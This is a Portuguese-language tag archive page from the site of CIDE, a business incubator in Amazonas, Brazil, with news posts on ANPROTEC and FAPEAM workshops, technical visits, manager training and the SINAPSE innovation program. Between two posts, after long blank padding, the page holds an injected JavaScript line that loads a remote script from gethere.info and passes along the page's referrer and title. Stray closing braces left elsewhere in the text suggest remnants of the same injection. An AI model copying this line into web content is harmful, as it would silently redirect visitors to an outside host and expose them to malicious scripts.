• 92 3216-3892
  • secretaria@cide.org.br

Arquivo da tag Fapeam

Incubadoras de empresas trocam experiências para melhorar serviços

Consultoras da Anprotec conversam com os representantes das incubadoras

Consultoras da Anprotec conversam com os representantes das incubadoras

 

Com o objetivo de trocar antigas e novas experiências, sobre melhorias de planejamentos, consultorias, acompanhamentos aos empreendedores instalados em incubadoras de empresas, o Centro de Incubação e Desenvolvimento Empresarial (CIDE) e mais seis incubadoras de empresas do Amazonas participaram, em março, na Universidade do Estado do Amazonas (UEA), do evento Workshop para Incubadoras.

 

O encontro serviu também para compartilhar experiências da implantação da metodologia do Centro de Referência para Apoio a Novos Empreendimentos (CERNE), chamado de “metodologia CERNE”, que auxilia as incubadoras no processo de gestão de incubação empresarial.

 

O encontro foi realizado pela Fundação de Amparo à Pesquisa do Amazonas (FAPEAM) e a Associação Nacional de Entidades Promotoras de Empreendimentos de Tecnologias Avançadas (ANPROTEC). “Na verdade, o método CERNE é implantado de acordo com a realidade de cada incubadora participante. Nenhuma incubadora é igual a outra. Por isso, a metodologia não permite cópias. Mas, podemos ajustar o exemplo de uma incubadora conforme a realidade da minha incubadora”, diz a consultora da ANPROTEC, Evelin Cristina Astolpho.

 

A consultora lembrou também que o compartilhamento de informações e experiências faz parte das atividades desenvolvidas pela ANPROTEC para melhorar a gestão das incubadoras de empresas. “A ‘métodologia CERNE’ diz o que tem que ser feito na gestão das incubadoras. Agora, como tem que ser feito ou realizado, cada incubadora vai colocar em prática de acordo com suas características, realidade e de acordo com as suas empresas instaladas”, diz Evelin Astolpho, acrescentando que todas as exposições feitas no evento são usadas para melhorar as práticas.

 

Nova visita técnica

Em março de 2016, o CIDE foi avaliado por consultores da ANPROTEC, que verificaram o grau de implantação da “metodologia Cerne”. Este ano, uma nova visita está programada. “A segunda visita técnica, sem data prevista, vai avaliar o que foi implantado em cada incubadora. Para cada centro de incubação fazemos um relatório e passamos à Fapeam. Nessa segunda visita técnica vamos ver o quanto avançou”, finaliza a consultora.

 

Para o diretor executivo do CIDE, José Barbosa Grosso, a metodologia auxilia na avaliação do potencial de cada empreendedor instalado. “Todo o processo de incubação é avaliado. Dessa forma, detectamos as metas, as dificuldades, os riscos, os objetivos e potenciais das empresas residentes aqui”, conclui.

Representantes de sete incubadoras de empresas participaram

Representantes de sete incubadoras de empresas participaram

 

Oc4

 

Oc3

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

CIDE recebe visita técnica da Anprotec

Consultores da Anprotec conversam com o diretor executivo do CIDE e com a equipe administrativa

Consultores da Anprotec conversam com o diretor executivo do CIDE e com a equipe administrativa

 

 

Os consultores da Associação Nacional de Entidades Promotoras de Empreendimentos de Tecnologias Avançadas (Anprotec), Evelin Astolpho e Carlos Lamberti Júnior, estiveram no Centro de Incubação e Desenvolvimento Empresarial, no último dia 11, realizando a visita técnica do convênio de apoio às incubadoras, do edital Pró-Incubadoras da Fundação de Amparo à Pesquisa do Amazonas (Fapeam), além  de verificar o grau de implantação da metodologia CERNE no centro.

 

Conforme a representante da Anprotec, Evelin Astolpho, a visita serviu para verificar as atividades realizadas a favor dos empreendimentos instalados no CIDE. “O importante é comprovar que as ações que fazem parte do CERNE estão sendo realizadas e que os resultados estão sendo gerados, visando todo um desenvolvimento local da Região”, disse.

 

Para a coordenadora do projeto no CIDE, Rosália Padilha, a implantação do projeto traz melhorias para as empresas instaladas. “ O projeto utilizará a metodologia do Centro de Referência para Apoio a Novos Empreendimentos (CERNE) que é uma plataforma de soluções com qualificação, práticas e processos estabelecidos, e é válido para todas as incubadoras do Brasil, visando à melhoria em planejamentos, capacitação, empreendimentos, assessorias, consultorias, acompanhamento, etc. Desse modo, podemos ter empreendimentos de sucesso”, destaca.

 

O edital prevê visitas às incubadoras de empresas a cada seis meses. “Todo o trabalho é feito em parceria com a Fundação de Amparo à Pesquisa do Estado do Amazonas (Fapeam), portanto, a próxima visita acontecerá de acordo com o que estabelece o edital”, lembra Evelin Astolpho, acrescentando que outras incubadoras de Manaus e de outros municípios vão ser visitadas.

 

Uma vez terminada a avaliação, os consultores se dirigiram a algumas empresas para conhecer os trabalhos desenvolvidos, em companhia do diretor executivo do CIDE, José Grosso, da equipe administrativa e da coordenadora do “CIDE2”, Elizabeth Araújo.

O diretor executivo do CIDE, José Grosso, fala das ações implantadas

O diretor executivo do CIDE, José Grosso, fala das ações implantadas

 

 

A coordenadora do projeto no CIDE, Rosália Padilha, explica aos visitantes como funciona a incubadora

A coordenadora do projeto no CIDE, Rosália Padilha, explica aos visitantes como funciona a incubadora

 

 

Consultores da Anprotec conhecem os produtos regionais no CIDE

Consultores da Anprotec conhecem os produtos regionais no CIDE

 

 

Equipe visita a Cheiro D´Folha, no CIDE.

Equipe visita a Cheiro D´Folha, no CIDE.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

CIDE e “CIDE 2” participam de curso oferecido pela Anprotec e pela Fapeam

Vários gestores de incubadoras de empresas e lideranças de municípios do Amazonas participam de curso da Anprotec

Vários gestores de incubadoras de empresas e lideranças de municípios do Amazonas participam de curso da Anprotec

 

 

 

Com o objetivo de estar sempre atualizado em um mundo em constante transformação em todos os segmentos, o Centro de Incubação e Desenvolvimento Empresarial (CIDE) e o CIDE Alvorada, conhecido como “CIDE 2”, participam do curso “Planejamento e Implantação de Incubadoras de Empresas”, oferecido pela Associação Nacional de Entidades Promotoras de Empreendimentos Inovadores (Anprotec) e pela Fundação de Amparo à Pesquisa no Estado do Amazonas (Fapeam), na Assembleia Legislativa do Amazonas (ALE).

O curso termina na quinta-feira, 10, e visa discutir com os participantes uma metodologia para o planejamento e a implantação de uma incubadora de empresas de sucesso, sintonizando-a com o ecossistema de inovação da região. Participam também, gestores de outros municípios do Amazonas e do Estado do Acre.

“Além de Manaus, selecionamos seis municípios no interior do Estado, onde estabeleceremos estratégias juntamente com as lideranças locais, para implantar incubadoras de empresas, fortalecendo o município e gerando renda à população”, enfatiza a consultora da Anprotec, Evelin Astolpho.

Ainda segundo a consultora, os municípios selecionados para o programa de formação são Presidente Figueiredo, Tefé, Coari, Parintins, Manacapuru e Itacoatiara. “Estamos formando os agentes locais para que eles sejam os gestores das incubadoras de empresas e possam apoiar os novos empreendedores, desenvolver negócios, selecionar projetos e trabalhar para que as ideias inovadoras virem empresas no futuro”, conclui Evelin.

 

 

 

Consultor da Anprotec fala aos gestores.

Consultor da Anprotec fala aos gestores.

 

 

F2

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

}

Capacitação para equipe gestora de incubadoras

 

 

Equipe de administração do Cide com os instrutores da Anprotec

Equipe de administração do Cide com os instrutores da Anprotec

 

A equipe de administração do Centro de Incubação e Desenvolvimento Empresarial (Cide), formada pelas administradoras Aldilene Infante, Rosália Padilha e Rita Queiroz, estiveram entre os dias 23 e 26 de junho, qualificando-se no curso de capacitação de Centros de Referência para Apoio a Novos Empreendimentos (CERNE 1 e 2). O curso garante uma gestão de melhores resultados, com focos em ações dos empreendimentos bem sucedidos, propiciando um planejamento e acompanhamento adequados às ações da incubadora e incubados.

 

A formação foi oferecida pela Fundação de Amparo à Pesquisa do Estado do Amazonas (Fapeam), em parceria com a Associação Nacional de Entidades Promotoras de Empreendimentos Inovadores (Anprotec) e aconteceu no Instituto Nacional de Pesquisa da Amazônia (INPA).

 

Juntamente com a equipe do Cide, estiveram, também, representantes de outras nove instituições acadêmicas, como a Universidade Federal do Amazonas (Ufam), Universidade do Estado do Amazonas (UEA), Universidade Luterana do Brasil (Ulbra), Instituto Federal do Amazonas (Ifam), Fundação Centro de Análise, Pesquisa e Inovação Tecnológica (Fucapi), representantes da Prefeitura Municipal de Presidente Figueiredo (município a 107 quilômetros de Manaus), entre outras.

 

A administradora do Cide, Rosália Padilha, entrega uma cesta de doces, produzidos no Cide, ao instrutor da Anprotec.

A administradora do Cide, Rosália Padilha, entrega uma cesta de doces, produzidos no Cide, ao instrutor da Anprotec.

 

Instrutora da Anprotec recebe doces regionais, produzidos no Cide.

Instrutora da Anprotec recebe doces regionais, produzidos no Cide.

 

 

 

 

 

 

 

 

Formação de agentes para o SINAPSE acontece na Ulbra

 

Representantes de várias instituições recebem formação sobre o SINAPSE

Representantes de várias instituições recebem formação sobre o SINAPSE

 

Depois de vinte dias da primeira reunião, representantes do SINAPSE da Inovação, programa de empreendedorismo inovador iniciado pela Fundação de Amparo à Pesquisa do Amazonas (FAPEAM), em parceria com a Fundação Centros de Referência em Tecnologias Inovadoras (CERTI) do Estado de Santa Catarina, voltaram a se reunir, nesta terça-feira, 14, com diretores de incubadoras de empresas e representantes de universidades e outras instituições ligadas ao programa, para a segunda formação. O encontro aconteceu na Universidade Luterana do Brasil (Ulbra), em Manaus.

Segundo o coordenador institucional do SINAPSE da Inovação, Antônio Rogério, a reunião serviu para realizar a capacitação dos agentes do programa. “Cada instituição participante possui um agente de divulgação. Então, estamos apresentando as metodologias que ajudarão na hora de informar sobre essa iniciativa”, disse.

Durante o encontro o diretor executivo do Centro de Incubação e Desenvolvimento Empresarial (CIDE), José Barbosa Grosso, colocou à disposição do SINAPSE as instalações da incubadora. “Estamos apoiando essa iniciativa e esperamos que, quando seja lançado o edital para jovens empreendedores, surjam ótimas ideias a serviço da sociedade e da economia do Amazonas”, ressaltou.

O próximo encontro foi marcado para o dia 29 de abril, na Faculdade Nilton Lins.

O projeto-piloto tem o objetivo de fomentar a criação de empreendimentos inovadores a partir de ideias geradas por universitários, pesquisadores e profissionais de diversas instituições de ensino ou empresariais, transformando-as em negócios de sucesso.

Ulbra2

 

 

 

 

 

 

 

 

 

}